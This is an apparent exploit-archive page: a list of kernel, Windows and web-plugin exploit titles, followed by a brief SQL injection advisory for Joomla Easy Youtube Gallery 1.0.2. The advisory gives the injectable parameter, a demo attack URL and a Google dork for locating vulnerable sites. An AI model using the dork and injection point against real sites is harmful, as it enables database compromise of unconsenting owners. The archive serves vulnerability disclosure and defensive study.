Linux Kernel <= 3.3.5 Btrfs CRC32C feature Infinite Loop Local Denial of Service Vulnerability
Linux Kernel <= 3.3.5 - Btrfs CRC32C feature Infinite Loop Local Denial of Service Vulnerability

Linux Kernel 3.3.5 'CLONE_NEWUSER|CLONE_FS' Local Privilege Escalation Vulnerability
Linux Kernel 3.3.5 - 'CLONE_NEWUSER|CLONE_FS' Local Privilege Escalation Vulnerability

Linux Kernel <= 3.2.1 Tracing Mutiple Local Denial of Service Vulnerabilities
Linux Kernel <= 3.2.1 - Tracing Mutiple Local Denial of Service Vulnerabilities

Win10Pcap - Local Privilege Escalation Vulnerability
Samsung m2m1shot Kernel Driver Buffer Overflow
Samsung seiren Kernel Driver Buffer Overflow
Samsung - m2m1shot Kernel Driver Buffer Overflow
Samsung - seiren Kernel Driver Buffer Overflow

Linux Kernel <= 3.3.5 'b43' Wireless Driver Local Privilege Escalation Vulnerability
Linux Kernel <= 3.3.5 - 'b43' Wireless Driver Local Privilege Escalation Vulnerability

NetUSB Kernel Stack Buffer Overflow
NetUSB - Kernel Stack Buffer Overflow

Linux Kernel <= 3.0.5 'test_root()' Function Local Denial of Service Vulnerability
Linux Kernel <= 3.0.5 - 'test_root()' Function Local Denial of Service Vulnerability
Windows Kernel win32k.sys Malformed TrueType Program TTF Font Processing Pool-Based Buffer Overflow (MS15-115)
Windows Kernel win32k.sys Malformed OS/2 Table TTF Font Processing Pool-Based Buffer Overflow (MS15-115)
Windows Kernel - win32k.sys Malformed TrueType Program TTF Font Processing Pool-Based Buffer Overflow (MS15-115)
Windows Kernel - win32k.sys Malformed OS/2 Table TTF Font Processing Pool-Based Buffer Overflow (MS15-115)

Chkrootkit Local Privilege Escalation
Chkrootkit - Local Privilege Escalation

Windows Kernel Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)
Windows Kernel - Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)

Linux Kernel <= 3.0.5 'ath9k_htc_set_bssid_mask()' Function Information Disclosure Vulnerability
Linux Kernel <= 3.0.5 - 'ath9k_htc_set_bssid_mask()' Function Information Disclosure Vulnerability

Acunetix WVS 10 - Local Privilege escalation
Acunetix WVS 10 - Local Privilege Escalation

Linux Kernel <= 3.3.5 '/drivers/media/media-device.c' Local Information Disclosure Vulnerability
Linux Kernel <= 3.3.5 - '/drivers/media/media-device.c' Local Information Disclosure Vulnerability

Linux Kernel REFCOUNT Overflow/Use-After-Free in Keyrings
Linux Kernel - REFCOUNT Overflow/Use-After-Free in Keyrings

Android sensord Local Root Exploit
Android - sensord Local Root Exploit

OS X and iOS Unsandboxable Kernel Use-After-Free in Mach Vouchers
OS X and iOS - Unsandboxable Kernel Use-After-Free in Mach Vouchers

Microsoft Windows WebDAV - Privilege Escalation (MS16-016)
Microsoft Windows WebDAV - (BSoD) Privilege Escalation (MS16-016)

Proxmox VE 3/4 Insecure Hostname Checking Remote Root Exploit
Proxmox VE 3/4 - Insecure Hostname Checking Remote Root Exploit
Windows Kernel ATMFD.DLL OTF Font Processing Pool-Based Buffer Overflow (MS16-026)
Windows Kernel ATMFD.DLL OTF Font Processing Stack Corruption (MS16-026)
Windows Kernel - ATMFD.DLL OTF Font Processing Pool-Based Buffer Overflow (MS16-026)
Windows Kernel - ATMFD.DLL OTF Font Processing Stack Corruption (MS16-026)
WordPress HB Audio Gallery Lite Plugin 1.0.0 - Arbitrary File Download
Joomla Easy Youtube Gallery 1.0.2 - SQL Injection Vulnerability
WordPress Brandfolder Plugin 3.0 - RFI / LFI Vulnerability
WordPress Dharma booking Plugin 2.38.3 - File Inclusion Vulnerability
WordPress Memphis Document Library Plugin 3.1.5 - Arbitrary File Download
2016-03-23 05:03:34 +00:00

21 lines
No EOL
724 B
Text
Executable file
Raw Blame History

######################
# Exploit Title : Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://extensions.joomla.org/extension/easy-youtube-gallery
# Google Dork : inurl:com_easy_youtube_gallery mycategory
# Date: 2016/03/22
# Version: 1.0.2
######################
# PoC:
# mycategory=[SQL]
#
# Demo:
# http://server/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0%27&defaultvideo=9&Itemid=752
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
# Greetz : Milad_Hacking & FireKernel And You
######################
Reference in a new issue View git blame Copy permalink